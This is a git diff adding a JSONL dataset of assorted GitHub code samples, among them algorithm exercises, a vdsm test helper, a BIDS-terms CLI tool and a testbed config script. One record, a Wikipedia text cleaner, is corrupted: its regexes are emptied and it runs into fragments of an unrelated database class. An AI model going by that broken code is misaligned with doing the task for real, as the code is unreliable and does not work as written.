diff --git "a/1799.jsonl" "b/1799.jsonl" new file mode 100644--- /dev/null +++ "b/1799.jsonl" @@ -0,0 +1,449 @@ +{"seq_id":"25246857107","text":"n, k = map(int, input().split())\n\ncoinList = []\ndptable = [0]*(k+1)\ndptable[0] = 1\n\nfor _ in range(n):\n coinList.append(int(input()))\n\nfor coin in coinList:\n for i in range(1, k+1):\n if i < coin:\n continue\n dptable[i] += dptable[i-coin]\n\nprint(dptable[-1])\n","repo_name":"kha-github/python-coding-team","sub_path":"2021.11.03/2293/ha_2293.py","file_name":"ha_2293.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"31420092289","text":"# Tuliskan identitas di sini\n# NIM/Nama\t: 16520299/Malik Akbar Hashemi Rafsanjani\n# Nama file\t: pita.py\n# Topik\t\t: Dekomposisi Algoritmik\n# Tanggal\t: 2 April 2021\n# Deskripsi\t: Program menerima masukan sebuah bilangan bulat, misal N dan kemudian menampilkan gambar pita bintang, \n# jika N adalah bilangan bulat ganjil (N > 0). Jika N bukan positif dan/atau bukan ganjil, maka diberikan pesan kesalahan.\n\n\n# Program GambarPita\n# Input: N : integer\n# Output: Jika N > 0 dan ganjil, gambar pita sesuai dengan N\n# Jika tidak, tampilkan pesan kesalahan: \n\n# KAMUS\n# Variabel\n# N : int\n\ndef GambarPita(N):\n# I.S. N > 0 dan N ganjil\n# F.S. Gambar pita dengan lebar sebesar N sesuai spesifikasi soal\n# Lengkapilah kamus lokal dan algoritma prosedur di bawah ini\n if N == 1:\n print(\"*\")\n else:\n print(\"*\"*N)\n for i in range(1, N//2 + 1):\n print(\" \"*i + \"*\"*(N - 2*i))\n for j in range(N//2 - 1,0,-1):\n print(\" \"*j + \"*\" * (N - 2*j))\n print(\"*\"*N)\n\ndef IsValid(N):\n# menghasilkan true jika N positif dan ganjil, false jika tidak\n# Lengkapilah kamus lokal dan algoritma fungsi di bawah ini\n if (N > 0) and (N % 2 == 1):\n return True\n else:\n return False\n\n# ALGORITMA PROGRAM UTAMA\nN = int(input())\nif (IsValid(N)): # lengkapi dengan pemanggilan fungsi IsValid\n GambarPita(N) # lengkapi dengan pemanggilan prosedur GambarPita\nelse: # N tidak positif atau N tidak ganjil\n print(\"Masukan tidak valid\")","repo_name":"malikrafsan/Praktikum-STEI-IF-ITB","sub_path":"Dasar-Pemrograman/PRAKTIKUM-4/RESPONSI/pita.py","file_name":"pita.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"id","doc_type":"code","stars":22,"dataset":"github-code","pt":"71"} +{"seq_id":"45917056428","text":"import httplib\nimport logging\nimport socket\nimport threading\n\nfrom xmlrpclib import Transport, dumps, Fault\nfrom contextlib import contextmanager\nfrom itertools import product\nfrom M2Crypto import SSL\nfrom rpc.BindingXMLRPC import BindingXMLRPC, XmlDetector\nfrom yajsonrpc.stompReactor import StompDetector\nfrom protocoldetector import MultiProtocolAcceptor\nfrom yajsonrpc import JsonRpcClient\nfrom rpc.BindingJsonRpc import BindingJsonRpc\nfrom sslhelper import DEAFAULT_SSL_CONTEXT\n\nPERMUTATIONS = tuple(product((True, False), (\"xml\", \"stomp\")))\n\nTIMEOUT = 3\n\n\nclass FakeClientIf(object):\n log = logging.getLogger(\"FakeClientIf\")\n\n def __init__(self):\n self.threadLocal = threading.local()\n self.irs = True\n self.gluster = None\n\n # API module is redefined for apiTests so we need to add BLANK_UUIDs\n import API\n API.Image.BLANK_UUID = '00000000-0000-0000-0000-000000000000'\n API.StorageDomain.BLANK_UUID = '00000000-0000-0000-0000-000000000000'\n API.Volume.BLANK_UUID = \"00000000-0000-0000-0000-000000000000\"\n\n @property\n def ready(self):\n return 
True\n\n\n@contextmanager\ndef constructAcceptor(log, ssl, jsonBridge):\n sslctx = DEAFAULT_SSL_CONTEXT if ssl else None\n acceptor = MultiProtocolAcceptor(\"127.0.0.1\", 0, sslctx)\n cif = FakeClientIf()\n\n xml_binding = BindingXMLRPC(cif, cif.log)\n xml_binding.start()\n xmlDetector = XmlDetector(xml_binding)\n acceptor.add_detector(xmlDetector)\n\n json_binding = BindingJsonRpc(jsonBridge)\n json_binding.start()\n stompDetector = StompDetector(json_binding)\n acceptor.add_detector(stompDetector)\n\n thread = threading.Thread(target=acceptor.serve_forever,\n name='Detector thread')\n thread.setDaemon(True)\n thread.start()\n\n try:\n yield acceptor\n finally:\n acceptor.stop()\n json_binding.stop()\n xml_binding.stop()\n\n\n@contextmanager\ndef constructClient(log, bridge, ssl, type):\n sslctx = DEAFAULT_SSL_CONTEXT if ssl else None\n with constructAcceptor(log, ssl, bridge) as acceptor:\n client = None\n if type == \"xml\":\n xml_handler = [h for h in acceptor._handlers if h.NAME == type]\n for (method, name) in bridge.getBridgeMethods():\n xml_handler[0].xml_binding.server.register_function(method,\n name)\n client = create\n else:\n for handler in acceptor._handlers:\n if handler.NAME == type:\n reactor = handler._reactor\n\n if not client:\n client = lambda client_socket: (\n JsonRpcClient(reactor.createClient(client_socket))\n )\n\n def clientFactory():\n return client(create_socket(\n sslctx,\n acceptor._host,\n acceptor._port\n ))\n\n yield clientFactory\n\n\ndef create_socket(sslctx, host, port):\n sock = None\n if sslctx:\n sock = SSL.Connection(sslctx.context)\n else:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(TIMEOUT)\n sock.connect((host, port))\n return sock\n\n\ndef create(socket):\n return XMLClient(socket)\n\n\nclass XMLClient():\n def __init__(self, socket):\n self.socket = socket\n self.transport = CustomTransport(socket)\n\n def send(self, method, params):\n request = dumps(params, method)\n try:\n response = self.transport.request(\"localhost\",\n \"/RPC2\", request)\n except Fault as e:\n response = e.faultString\n\n if isinstance(response, tuple):\n response = response[0]\n return response\n\n def connect(self):\n pass\n\n def setTimeout(self, timeout):\n self.socket.settimeout(timeout)\n\n def close(self):\n self.socket.close()\n\n\nclass CustomTransport(Transport):\n\n def __init__(self, socket):\n Transport.__init__(self)\n\n def connect(self):\n self.sock = socket\n\n connection = httplib.HTTPConnection\n connection.connect = connect\n","repo_name":"Caez83/vdsm","sub_path":"tests/jsonRpcHelper.py","file_name":"jsonRpcHelper.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"35589681152","text":"import cv2 as cv\nimport time\n\ncamera = cv.VideoCapture(0)\n\nwhile(True):\n ret, image = camera.read()\n ts = time.time()\n name = int(ts)\n cv.imwrite('photos/'+str(name)+'.jpg', image)\n time.sleep(1)\n print(name)\n\ncamera.release()\ncv.destroyAllWindows()","repo_name":"hatrari/OnePhotoEverySecond","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"41457138558","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n### IMPORTANT:\n### 1. has to be run in python2\n### 2. 
From AA format to complete sentences.\n\n\nimport re\nimport os\n\ndef punctuation(text):\n \"\"\"change all parentheses to to japanese characters\"\"\"\n text = re.sub(r'\\(', '(', text, flags=re.DOTALL) # replace EN L paren w/JP L paren\n text = re.sub(r'\\)', ')', text, flags=re.DOTALL) # replace EN R paren w/JP R paren\n return text\n\narticle_text = []\narticle_folders = os.listdir('./texts/')\n\nfor folder in article_folders:\n shortpath = './texts/' + folder\n print(folder)\n longpath = '/home/greg/NLP/prime/texts/' + folder + '/'\n # filename = 'wikiclean' + folder + '.txt'\n for fn in os.listdir(shortpath):\n print(fn)\n try:\n wikitext = open(os.path.join(longpath, fn), 'r').read()\n except Exception as inst:\n print(fn)\n print(type(inst)) # the exception instance\n print(inst.args) # arguments stored in .args\n print(inst)\n\n wikitext = punctuation(wikitext)\n wikitext = re.sub(r'([\\s\\S]*?)', '', wikitext) # (1) remove category/wikipedia/image entries\n wikitext = re.sub(r'\\n.*\\n', '', wikitext) # (2) remove opening doc tags and article title on following line\n wikitext = re.sub(r'<[ / ]?doc[ / ]?>', '', wikitext) # (3) remove closing doc tags\n wikitext = re.sub(r'<[ / ]?br[ / ]?>', '', wikitext) # (4) remove all variation of linebreaks\n wikitext = re.sub(r'[\\(\\uff08][^\\(\\uff08\\)\\uff09]*[\\)\\uff09]', '', wikitext) # (5) remove parentheticals\n wikitext = re.sub(r'<.*?>([\\s\\S]*?)', '', wikitext) # (6) remove other content between tags\n wikitext = re.sub(r'.+(?= Datetime(?) AND action_type = ? ORDER BY Datetime(time) ASC\", (time, self.end_action))\n result = c.fetchone()\n self.disconnect_from_database(conn)\n return result\n\n def update_row(self, new_project_name, new_time, old_project_name, old_time, action_type):\n conn, c = self.connect_to_database()\n c.execute(\"UPDATE times SET project_name = ?, time = ? WHERE project_name = ? AND time = ? AND action_type = ?;\", (new_project_name, new_time, old_project_name, old_time, action_type))\n self.disconnect_from_database(conn)\n\n def delete_row(self, project_name, time, action_type):\n conn, c = self.connect_to_database()\n c.execute(\"DELETE FROM times WHERE project_name = ? AND time = ? 
AND action_type = ?;\", (project_name, time, action_type))\n self.disconnect_from_database(conn)\n\n def create_row(self, project_name, time, action_type):\n conn, c = self.connect_to_database()\n c.execute(\"INSERT INTO times (project_name, time, action_type) VALUES (?, ?, ?)\", (project_name, time, action_type))\n self.disconnect_from_database(conn)\n\n def get_dataframe_times(self):\n conn, c = self.connect_to_database()\n df = pd.read_sql_query(\"SELECT times.project_name, times.time, times.action_type FROM times INNER JOIN project_names ON times.project_name = project_names.project_name WHERE is_hidden IS FALSE ORDER BY Datetime(time) ASC, action_type DESC\", conn)\n self.disconnect_from_database(conn)\n return df\n\n def get_dataframe_all_times(self):\n conn, c = self.connect_to_database()\n df = pd.read_sql_query(\"SELECT * FROM times ORDER BY Datetime(time) ASC, action_type DESC\", conn)\n self.disconnect_from_database(conn)\n return df\n","repo_name":"JulienEyzat/work-timer","sub_path":"DatabaseInterface.py","file_name":"DatabaseInterface.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"16648368858","text":"import os,sys\nfrom os import system\nfrom argparse import ArgumentParser\nimport pandas as pd\nfrom pyld import jsonld\nfrom os.path import join\nimport json\nimport tempfile\nimport urllib.request as ur\nfrom urllib.parse import urlparse\n\n\n\n#from .add_term import add_term\n#from .table_utils import generate_pdf,export_markdown_table\ntry:\n from nidm.experiment.Utils import authenticate_github\nexcept ImportError:\n print(\"trying to install required module: PyNIDM\")\n system('python -m pip install --upgrade pip pynidm')\n from nidm.experiment.Utils import authenticate_github\n\n\nfrom github import Github, GithubException\n\n\n\n# Placeholder for GitHub source repo to fork and add new terms to\nGITHUB_SOURCE_REPO = \"https://github.com/nqueder/bids_terms_to_pdf_table\"\n\n# WIP: Placeholder for JSON-LD context file\nCONTEXT = \"https://raw.githubusercontent.com/NIDM-Terms/terms/master/context/cde_context.jsonld\"\n\n\ndef search_term(terms_dict):\n\n print('')\n term_searched = input('Please enter full or partial BIDS term: ')\n print('')\n print('Searching for BIDS terms')\n print('')\n\n\n searched_keys = []\n\n # dictionary that will hold terms in lower case as keys and original terms as values\n temp_dict = {}\n\n num_selector = 1\n\n\n #convert the input term or searched term to all lower case\n lower_searched = term_searched.lower()\n\n\n for lower_key in terms_dict.keys():\n temp_dict[lower_key] = lower_key\n\n\n #covert all of the keys in temp dict to lower case to search terms\n term_lower = {k.lower(): v for k, v in temp_dict.items()}\n\n\n for key, value in term_lower.items():\n\n\n if lower_searched in key:\n print('%d. 
%s : %s'% (num_selector,term_lower[key],terms_dict[term_lower[key]]['description']))\n num_selector = num_selector + 1\n searched_keys.append(term_lower[key])\n\n\n # ask the user for entry and ensure that they're selecting a valid number\n if len(searched_keys) > 0:\n print('')\n input_number = input('Please choose from the terms above or return to go back to main menu: ')\n if input_number == \"\":\n print('No term selected, returning to main menu')\n return\n else:\n input_number = int(input_number)-1\n\n if not (input_number < 0) and (input_number > (len(searched_keys)-1)):\n print('')\n print('---------------------------------------------------------------')\n print('')\n print('Please select a valid entry...')\n else:\n term_selected = searched_keys[input_number]\n return term_selected\n\n else:\n print('')\n print('NO MATCHING BIDS TERMS HAVE BEEN FOUND...')\n return\n\n\n\ndef select_term(terms_dict,bids_terms):\n\n #sort items in alphabetical order so its easier for the user to choose terms\n #bids_terms = bids_terms.sort()\n\n retry = 'retry'\n\n keys_list = []\n\n num_selector = 1\n for key, value in terms_dict.items():\n print('')\n print('%d. %s : %s'% (num_selector,key,terms_dict[key]['description']))\n num_selector = num_selector + 1\n keys_list.append(key)\n #stor a temp list of keys, go to list entry 10 and see what 10 maps to\n\n print('')\n\n # ask the user for entry and ensure that they're selecting a valid number\n input_number = input('Please choose from the terms above or return to go back to main menu: ')\n if input_number == \"\":\n print('')\n print('---------------------------------------------------------------')\n print('')\n print('No terms selected, returning to the main menu...')\n return\n else:\n input_number = int(input_number)-1\n if (input_number < 0) or (input_number > (len(keys_list)-1)):\n print('')\n return retry\n else:\n term_selected = keys_list[input_number]\n return term_selected\n\n\ndef load_available_properties(terms_dict):\n '''\n Takes union of all properties available for current BIDS terms\n :return: list of available properites\n '''\n\n property_list = []\n\n # go through each BIDS terms label and get properties\n for label,property_dict in terms_dict.items():\n # then loop through properties and add property if not already added\n for property, value in property_dict.items():\n if (property not in property_list) and (property != \"@type\") and (property != \"@context\"):\n # if property isn't in our list add it\n property_list.append(property)\n\n return property_list\n\n\n\ndef main(agrv):\n\n parser = ArgumentParser(description='This tool will allow the user to search across existing BIDS terms allowing for '\n 'creation of a Markdown table for the BIDS specification documents. The tool will also'\n 'allow the user to add new BIDS terms, which will result in JSON-LD files added to '\n '\"bids_terms_to_pdf_table\" Github repository')\n\n parser.add_argument('-in', dest='in_dir', required=True, help='Path to cloned \"bids_terms_to_pdf_table\" Github repository')\n parser.add_argument('-out', dest= 'out_dir', required=True, help='Path to output directory: only required if you would like'\n ' to export a PDF table of BIDS specification terms')\n parser.add_argument('-github',dest='github',required=False,help='WIP: Optional username,password or username,token for your'\n 'GitHub account. If not defined then software will ask on'\n 'command line if you create a new BIDS term. 
The source repo'\n 'will be forked into your user space and generate a new pull'\n 'request for the new term to be added to the BIDS terminology.' )\n\n\n\n args = parser.parse_args()\n\n\n #Set paths to input and output directory\n path_to_jld = os.path.join(args.in_dir,'BIDS_Terms')\n path_to_out = args.out_dir\n\n #read dictionary that defines our properties\n path_to_prop_def = os.path.join(args.in_dir,'utils/property_def.json')\n with open (path_to_prop_def) as f:\n prop_def = json.load(f)\n\n\n #List all existing BIDS terms JSON-LD files\n bids_terms_ = os.listdir(path_to_jld)\n\n # all currently available BIDS terms\n bids_terms = []\n # terms selected for pdf table\n selected_terms = []\n # list of term properties selected for inclusion in PDF table\n selected_properties = []\n # term properties available\n available_properties = []\n # dict of all terms\n terms_dict = {}\n\n\n #Loop through the terms in bids_terms_ takeout the \".jsonld\" extention\n file_count = 0\n for t in bids_terms_:\n if file_count % 50 == 0:\n done=str(int((float(file_count)/len(bids_terms_))*100))\n print(\" Loading existing BIDS terms: %s%% %s\"%(done,\"\\r\"))\n if t.startswith(\".\"):\n continue\n path_to_term = os.path.join(path_to_jld, t)\n with open (path_to_term) as p:\n term_dict = json.load(p)\n terms_dict[term_dict['label']] = term_dict\n file_count = file_count + 1\n\n #Present the user with instructions\n print('\\nUsing the table below, select terms to be added to a Markdown table')\n print('Select an existing term and repeat until you have added all the terms you want in the table')\n print('Once complete, select 4 to create the Markdown table')\n print('If you want to add a new term, select option 3 and add the various term properties\\n')\n\n\n\n while True:\n # print options for the user to select from\n print('')\n print('---------------------------------------------------------------')\n print('1. Select a term')\n print('2. Search terms')\n print('3. Add new term')\n print(\"4. Create Markdown table of selected terms (%s)\" % selected_terms)\n print('5. Exit')\n print('---------------------------------------------------------------')\n print('')\n\n #Allow the user to input a number that correspond to their choice\n num = int(input('Please choose from the options above: '))\n\n if (num < 1) or (num > 5):\n print(\"Please select a valid option (1-4)\")\n continue\n\n if num == 1:\n sel_temp = select_term(terms_dict,bids_terms)\n if sel_temp == 'retry':\n print('---------------------------------------------------------------')\n print('')\n print('Please select a valid entry...')\n print('')\n print('---------------------------------------------------------------')\n sel_temp = select_term(terms_dict,bids_terms)\n if sel_temp in selected_terms:\n print('')\n print('This term has already been added to your list, please select a different term...')\n elif not sel_temp in selected_terms and sel_temp != 'retry':\n selected_terms.append(sel_temp)\n\n if num == 2:\n sear_temp = search_term(terms_dict)\n if sear_temp is None:\n continue\n else:\n if sear_temp in selected_terms:\n print('')\n print('This term has already been added to your list, please select a different term...')\n elif not sear_temp in selected_terms:\n selected_terms.append(sear_temp)\n\n # adding a new BIDS term\n if num == 3:\n # create new BIDS term and save to new dictionary\n new_term = add_term(terms_dict)\n print(\"New BIDS term created. 
Adding to BIDS terms dictionary and generating a GitHub pull request...\")\n\n # add new_term dictionary to existing bids_terms dictionary\n terms_dict.update(new_term)\n\n\n\n # try and open context file for JSON-LD\n #try to open the url and get the pointed to file\n try:\n #open url and get file\n opener = ur.urlopen(CONTEXT)\n # write temporary file to disk and use for stats\n temp = tempfile.NamedTemporaryFile(delete=False)\n temp.write(opener.read())\n temp.close()\n context_file = temp.name\n # read in jsonld context\n with open(context_file) as context_data:\n context = json.load(context_data)\n except:\n print(\"ERROR! Can't open url: %s\" %CONTEXT)\n print(\"Won't be able to write your new term to JSON-LD....\")\n print(\"Will write it as JSON to output directory for now to save the work\")\n with open(join(args.out_dir,str((new_term.key())[0]) + \".json\"),'w') as fp:\n json.dump(new_term,fp,indent=4)\n continue\n\n # write the new term JSON-LD file to the output directory\n # open a new dictionary\n doc = {}\n\n #add type as schema.org/DataElement\n doc['@type'] = context['@context']['DataElement']\n\n # copy over new_term dictionary items given the context file mappings between dictionary\n # keys and urls\n for key,subdict in new_term.items():\n for property,value in subdict.items():\n doc[context['@context'][property]] = value\n\n # create the association\n # add property to specify that the term is associated with NIDM\n doc[context['@context']['associatedWith']] = [str('NIDM'),str('BIDS')]\n\n # create compacted jsonld\n compacted = jsonld.compact(doc,CONTEXT)\n\n # try to fork the GITHUB_SOURCE_REPO into the user's github space and\n # commit the new JSON-LD file and do a pull request\n try:\n # git fork of main BIDS terms repo into user's github space\n if args.github:\n git_auth,github_obj = authenticate_github(credentials=args.github)\n else:\n git_auth,github_obj = authenticate_github(credentials=[])\n\n # fork source repo if not already in user's GitHub space\n # get github user\n github_user = github_obj.get_user()\n # create fork\n user_fork = github_user.create_fork(GITHUB_SOURCE_REPO)\n\n #user_fork.create_file(\"test.txt\", \"test\", \"test\", branch=\"test\")\n # write new term to JSON-LD file to user's forked github space\n\n # do a git commit\n\n # do a git push\n\n # issue a pull request to main BIDS terms repo\n except:\n e = sys.exc_info()[0]\n print(\"Error adding your new term to forked GitHub repository.\")\n print(\"Writing JSON-LD file (%s) to the output directory.\"\n %join(args.out_dir,list(new_term.keys())[0] + \".jsonld\"))\n print(\"You'll need to submit this new term to the GitHub repo yourself!\")\n\n # write jsonld file to output directory....\n with open(join(args.out_dir,list(new_term.keys())[0] + \".jsonld\"),'w') as fp:\n json.dump(compacted,fp,indent=4)\n\n\n\n # adding properties for table creation\n if num == 4:\n num_selectors = 1\n property_list = load_available_properties(terms_dict)\n while True:\n print(\"Please select which properties to include in the the table:\")\n print(\"Properties selected: %s\" %selected_properties)\n\n for property in property_list:\n \n if property in prop_def.keys():\n print(\"%d. %s : %s\" %(num_selectors, property,prop_def[property]))\n else:\n print(\"%d. %s\" %(num_selectors, property))\n\n num_selectors = num_selectors + 1\n\n print(\"%d. 
Done Selecting, Create Markdown!\" % num_selectors)\n #Allow the user to input a number that correspond to their choice\n property = int(input('Please choose from the following options: '))\n\n if (property<1) or (property > (len(property_list))+1):\n continue\n # if they selected the \"Done\" selection then exit this loop\n elif property == num_selectors:\n break\n # if they selected a property add it to the selected properties list for PDF table\n else:\n selected_properties.append(property_list[property-1])\n num_selectors = 1\n\n\n # create PDF table and exist loop\n export_markdown_table(term_dictionary=terms_dict,selected_properties=selected_properties,selected_terms=selected_terms,\n file_name=join(args.out_dir,\"test.md\"))\n #generate_pdf(term_dictionary=terms_dict,selected_properties=selected_properties,selected_terms=selected_terms,\n # file_name=join(args.out_dir,\"test.pdf\"))\n\n #generate_pdf_pdfkit(term_dictionary=terms_dict,selected_properties=selected_properties,selected_terms=selected_terms,\n # file_name=join(args.out_dir,\"test.pdf\"))\n # break\n\n # if the user wants to exit without creating a PDF table\n if num == 5:\n exit(0)\n\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n","repo_name":"nqueder/bids_terms_to_markdown_table","sub_path":"utils/bidsterms2pdf.py","file_name":"bidsterms2pdf.py","file_ext":"py","file_size_in_byte":15864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"26032982621","text":"# 이분 그래프\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\n\n# def bfs(vertex):\n# q = deque()\n# q.append([vertex, 0])\n# while q:\n# v, t = q.popleft()\n# team[v] = t\n# if v not in graph:\n# continue\n# for i in graph[v]:\n# if team[i] == -1:\n# q.append([i, 1-t])\n# elif team[i] == t:\n# return False\n# return True\n\nimport sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**9)\n\ndef dfs(vertex):\n if team[vertex] == -1:\n team[vertex] = 0\n t = team[vertex]\n\n if vertex not in graph:\n return True\n \n for i in graph[vertex]:\n if team[i] == -1:\n team[i] = 1 - t\n if not dfs(i):\n return False\n elif team[i] == t:\n return False\n return True\n\n\nT = int(input())\nfor _ in range(T):\n graph = {}\n v, e = map(int, input().split())\n for i in range(e):\n a, b = map(int, input().split())\n if a in graph:\n graph[a].append(b)\n else:\n graph[a] = [b]\n if b in graph:\n graph[b].append(a)\n else:\n graph[b] = [a]\n team = [-1] * (v+1)\n \n flag = True\n for i in range(1, v+1):\n if team[i] == -1:\n if not dfs(i):\n flag = False\n break\n if not flag:\n print(\"NO\")\n else:\n print(\"YES\")","repo_name":"skdus531/algorithm","sub_path":"GRAPH/BOJ1707.py","file_name":"BOJ1707.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"12423686104","text":"\nimport time\n# list comprehension vs for loop\n\n# using for loop..\n\ncharList = []\n\nfor char in 'character list':\n charList.append(char)\n\nprint(\"charList:\", charList)\n# output: charList: ['c', 'h', 'a', 'r', 'a', 'c', 't', 'e', 'r', ' ', 'l', 'i', 's', 't']\n\n# using list comprehension..\ncharListComp = [char for char in 'character list']\nprint(\"charListComp:\", charListComp)\n# output: charListComp: ['c', 'h', 'a', 'r', 'a', 'c', 't', 'e', 'r', ' ', 'l', 'i', 's', 't']\n\n# ------------------------------------\n\n# time analysis | list comprehension vs for loop\n\nresultList = []\n\n\ndef 
expoFun(num):\n for i in range(num):\n resultList.append(i**2)\n return resultList\n\n\nbegin = time.time()\nexpoFun(10**6)\nend = time.time()\n\nprint(\"time taken by for loop:\", round(end-begin, 2))\n\n\ndef compreFun(n):\n return [i**2 for i in range(n)]\n\n\nbegin = time.time()\ncompreFun(10**6)\nend = time.time()\nprint(\"time taken by comprehension:\", round(end-begin, 2))\n","repo_name":"kvarad6/python-basics","sub_path":"listComprehension.py","file_name":"listComprehension.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"3813085056","text":"from shutil import copyfile\nimport yaml\nimport datetime\nimport os\nimport argparse\n\n\"\"\"\"\nTestbed Processing\n\nRequirement:\n python version: 2.X\n python package: PyYAML 3.12 (or later)\n\nPyYaml Install Instructions:\n [1] Download PyYAML from https://pyyaml.org/wiki/PyYAML\n [2] Unpack the archive\n [3] Install the package by executing (python setup.py install)\n [4] Test if installation was successful (python setup.py test)\n\nUsage:\n put TestbedProcessing.py and testbed.yaml under sonic-mgmt/ansible\n python TestbedProcessing.py\n python TestbedProcessing.py -i testbed.yaml\n\nArguments:\n -i : the testbed.yaml file to parse\n -basedir : the basedir for the project\n -backupdir : the backup directory for the files\n\nScript Procedure\n [1] Backup the files we will be copying\n [2] Load testbed.yaml into dictionaries for easy processing\n [3] Generate the files via methods defined below\n\"\"\"\n\n# ARGUMENTS TO PARSE\nparser = argparse.ArgumentParser(description=\"Process testbed.yml file\")\nparser.add_argument('-i', help='a file for the testbed processing script', nargs=\"?\", default=\"testbed-new.yaml\")\nparser.add_argument('-basedir', help='base directory to find the files, points to /sonic-mgmt/ansible', default=\"\")\nparser.add_argument('-backupdir', help='backup directory to store files, points to /sonic-mgmt/ansible/backup',nargs=\"?\", default=\"backup\")\nargs = parser.parse_args()\n\n# FILES TO BACKUP\nmain_file = \"group_vars/vm_host/main.yml\"\nvmHostCreds_file = \"group_vars/vm_host/creds.yml\"\nlabLinks_file = \"files/sonic_lab_links.csv\"\ntestbed_file = \"testbed.csv\"\ndevices_file = \"files/sonic_lab_devices.csv\"\neosCred_file = \"group_vars/eos/creds.yml\"\nfanoutSecrets_file = \"group_vars/fanout/secrets.yml\"\nlabSecrets_file = \"group_vars/lab/secrets.yml\"\nlab_file = \"lab\"\ninventory_file = \"inventory\"\ndockerRegistry_file = \"vars/docker_registry.yml\"\nveos_file = \"veos\"\n# the number of host_var files vary. therefore, backup process creates a list of all files under host_vars folder, iterates through the list, and copies them to backup directory\n\n#Backup List\n#backupList does not encompass host_var files because the number of host_var files vary. 
therefore, backup process creates a list of all files under host_vars folder, iterates through the list, and copies them to backup directory\nbackupList = []\nbackupList.append(main_file)\nbackupList.append(vmHostCreds_file)\nbackupList.append(labLinks_file)\nbackupList.append(testbed_file)\nbackupList.append(devices_file)\nbackupList.append(eosCred_file)\nbackupList.append(fanoutSecrets_file)\nbackupList.append(labSecrets_file)\nbackupList.append(lab_file)\nbackupList.append(inventory_file)\nbackupList.append(dockerRegistry_file)\nbackupList.append(veos_file)\n\n#Backup Directories\nnow = datetime.datetime.now()\ntimestamp = str(now.month) + \"_\" + str(now.day) + \"_\" + str(now.year) + \"_\" + str(now.hour) + str(now.minute) + \"_\" + str(now.second)\nos.makedirs(args.backupdir + \"/\" + timestamp) # create folder in backup directory labeled with the current timestamp\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/files\") # create files folder under the timestamped folder\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/host_vars\") # create host_vars folder under the timestamped folder\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/group_vars\") # create group_vars folder under the timestamped folder\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/group_vars/eos\") # create group_vars/eos folder under the timestamped folder\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/group_vars/fanout\") # create group_vars/fanout folder under the timestamped folder\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/group_vars/lab\") # create group_vars/lab folder under the timestamped folder\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/group_vars/vm_host\") # create group_vars/vm_host folder under the timestamped folder\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/vars\") # create vars folder under the timestamped folder\n\n\"\"\"\nrepresent_none(self, _)\nmodifies yaml to replace null values with blanks\nSOURCE: https://stackoverflow.com/questions/37200150/can-i-dump-blank-instead-of-null-in-yaml-pyyaml/37201633#3720163\n\"\"\"\ndef represent_none(self, _):\n return self.represent_scalar('tag:yaml.org,2002:null', '')\nyaml.add_representer(type(None), represent_none)\n\n\n\"\"\"\ngenerateDictionary(data, result, category)\n@:parameter data - the dictionary to iterate through\n@:parameter result - the resulting dictionary\nGenerates the dictionaries that are used when creating csv, yml, or text files\n\"\"\"\ndef generateDictionary(data, result, category):\n for key, value in data[category].items():\n result.update({key: value})\n\n\n\"\"\"\nmakeMain(data, outfile)\n@:parameter data - the dictionary to look through\n@:parameter outfile - the file to write to\nmakeMain generates the vm_host/main.yml file\nit pulls two sets of information; dictionary data and proxy data\n\"\"\"\ndef makeMain(data, outfile):\n veos = data\n dictData = {\n \"root_path\": veos.get(\"root_path\"),\n \"vm_images_url\": veos.get(\"vm_images_url\"),\n \"cd_image_filename\": veos.get(\"cd_image_filename\"),\n \"hdd_image_filename\": veos.get(\"hdd_image_filename\"),\n \"skip_image_downloading\": veos.get(\"skip_image_downloading\"),\n \"vm_console_base\": veos.get(\"vm_console_base\"),\n \"memory\": veos.get(\"memory\"),\n \"max_fp_num\": veos.get(\"max_fp_num\"),\n \"ptf_bp_ip\": veos.get(\"ptf_bp_ip\"),\n \"ptf_bp_ipv6\": veos.get(\"ptf_bp_ipv6\")\n }\n proxy = {\n \"proxy_env\": {\n \"http_proxy\": veos.get(\"proxy_env\").get(\"http_proxy\"),\n \"https_proxy\": 
